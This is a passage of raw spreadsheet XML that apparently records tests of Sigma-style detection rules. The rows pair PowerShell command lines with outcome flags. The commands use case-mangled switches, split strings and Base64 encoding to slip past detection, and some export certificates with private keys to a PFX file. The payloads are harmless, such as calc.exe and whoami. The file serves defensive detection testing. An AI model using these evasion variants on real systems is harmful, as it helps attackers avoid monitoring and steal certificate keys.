        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2086" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2086" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2086" s="43" t="n"/>
      <c r="J2086" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2086" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2087" ht="15.75" customHeight="1" s="42">
      <c r="A2087" s="43" t="n"/>
      <c r="B2087" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2087" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2087" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2087" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2087" s="43" t="n"/>
      <c r="J2087" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2087" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2088" ht="15.75" customHeight="1" s="42">
      <c r="A2088" s="43" t="n"/>
      <c r="B2088" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2088" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2088" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2088" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2088" s="44" t="n"/>
      <c r="J2088" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2088" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2089" ht="15.75" customHeight="1" s="42">
      <c r="A2089" s="43" t="n"/>
      <c r="B2089" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2089" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2089" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2089" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2089" s="44" t="n"/>
      <c r="J2089" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2089" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2090" ht="15.75" customHeight="1" s="42">
      <c r="A2090" s="43" t="n"/>
      <c r="B2090" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2090" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2090" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2090" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2090" s="44" t="n"/>
      <c r="J2090" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2090" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2091" ht="15.75" customHeight="1" s="42">
      <c r="A2091" s="43" t="n"/>
      <c r="B2091" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2091" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2091" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2091" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2091" s="43" t="n"/>
      <c r="J2091" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2091" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2092" ht="15.75" customHeight="1" s="42">
      <c r="A2092" s="43" t="n"/>
      <c r="B2092" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2092" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2092" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2092" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMand "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2092" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2092" s="43" t="n"/>
      <c r="J2092" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2092" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2093" ht="15.75" customHeight="1" s="42">
      <c r="A2093" s="43" t="n"/>
      <c r="B2093" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2093" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2093" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2093" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2093" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2093" s="44" t="n"/>
      <c r="J2093" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2093" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2094" ht="15.75" customHeight="1" s="42">
      <c r="A2094" s="43" t="n"/>
      <c r="B2094" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2094" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2094" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2094" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaND "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2094" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2094" s="43" t="n"/>
      <c r="J2094" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2094" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2095" ht="15.75" customHeight="1" s="42">
      <c r="A2095" s="43" t="n"/>
      <c r="B2095" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2095" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2095" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2095" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F2095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2095" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2095" s="43" t="n"/>
      <c r="J2095" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2095" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2096" ht="15.75" customHeight="1" s="42">
      <c r="A2096" s="43" t="n"/>
      <c r="B2096" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2096" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2096" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2096" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F2096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2096" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2096" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2096" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J2096" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2096" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2097" ht="15.75" customHeight="1" s="42">
      <c r="A2097" s="43" t="n"/>
      <c r="B2097" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2097" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2097" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2097" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F2097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2097" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2097" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2097" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J2097" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2097" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2098" ht="15.75" customHeight="1" s="42">
      <c r="A2098" s="43" t="n"/>
      <c r="B2098" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C2098" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D2098" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E2098" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F2098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2098" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2098" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2098" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J2098" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2098" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2099" ht="15.75" customHeight="1" s="42">
      <c r="A2099" s="43" t="n"/>
      <c r="B2099" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2099" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2099" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2099" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F2099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2099" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2099" s="43" t="n"/>
      <c r="J2099" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2099" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2100" ht="15.75" customHeight="1" s="42">
      <c r="A2100" s="43" t="n"/>
      <c r="B2100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2100" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2100" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2100" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F2100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2100" s="43" t="n"/>
      <c r="J2100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2100" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2101" ht="15.75" customHeight="1" s="42">
      <c r="A2101" s="43" t="n"/>
      <c r="B2101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2101" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2101" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2101" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F2101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2101" s="43" t="n"/>
      <c r="J2101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2101" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2102" ht="15.75" customHeight="1" s="42">
      <c r="A2102" s="43" t="n"/>
      <c r="B2102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2102" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2102" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2102" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F2102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2102" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2103" ht="15.75" customHeight="1" s="42">
      <c r="A2103" s="43" t="n"/>
      <c r="B2103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2103" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2103" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2103" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDeDcOmmand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F2103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2103" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2104" ht="15.75" customHeight="1" s="42">
      <c r="A2104" s="43" t="n"/>
      <c r="B2104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2104" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2104" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2104" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F2104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2104" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2104" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2105" ht="15.75" customHeight="1" s="42">
      <c r="A2105" s="43" t="n"/>
      <c r="B2105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2105" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2105" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2105" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODedCOMMand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F2105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2105" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2105" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2105" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2106" ht="15.75" customHeight="1" s="42">
      <c r="A2106" s="43" t="n"/>
      <c r="B2106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C2106" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D2106" s="44" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E2106" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCoMmAnD UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F2106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2106" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2106" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2107" ht="15.75" customHeight="1" s="42">
      <c r="A2107" s="43" t="n"/>
      <c r="B2107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C2107" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D2107" s="44" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E2107" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d2hvYW1p'))|  iex"</t>
        </is>
      </c>
      <c r="F2107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2107" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J2107" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2108" ht="15.75" customHeight="1" s="42">
      <c r="A2108" s="43" t="n"/>
      <c r="B2108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C2108" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D2108" s="44" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E2108" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d2hvYW1p'))|  iex"</t>
        </is>
      </c>
      <c r="F2108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2108" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J2108" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2109" ht="15.75" customHeight="1" s="42">
      <c r="A2109" s="43" t="n"/>
      <c r="B2109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2109" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2109" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2109" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F2109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2109" s="43" t="n"/>
      <c r="J2109" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2109" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2110" ht="15.75" customHeight="1" s="42">
      <c r="A2110" s="43" t="n"/>
      <c r="B2110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2110" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2110" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2110" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F2110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2110" s="44" t="n"/>
      <c r="J2110" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2110" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2111" ht="15.75" customHeight="1" s="42">
      <c r="A2111" s="43" t="n"/>
      <c r="B2111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2111" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2111" s="44" t="inlineStr">
        <is>
          <t>c31364f7-8be6-4b77-8483-dd2b5a7b69a3</t>
        </is>
      </c>
      <c r="E2111" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "Import-Module $Env:TMP\suspicious_module.psm1"</t>
        </is>
      </c>
      <c r="F2111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2111" s="44" t="n"/>
      <c r="J2111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2111" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2112" ht="15.75" customHeight="1" s="42">
      <c r="A2112" s="43" t="n"/>
      <c r="B2112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_module_susp_dirs</t>
        </is>
      </c>
      <c r="C2112" s="44" t="inlineStr">
        <is>
          <t>Import PowerShell Modules From Suspicious Directories - ProcCreation</t>
        </is>
      </c>
      <c r="D2112" s="44" t="inlineStr">
        <is>
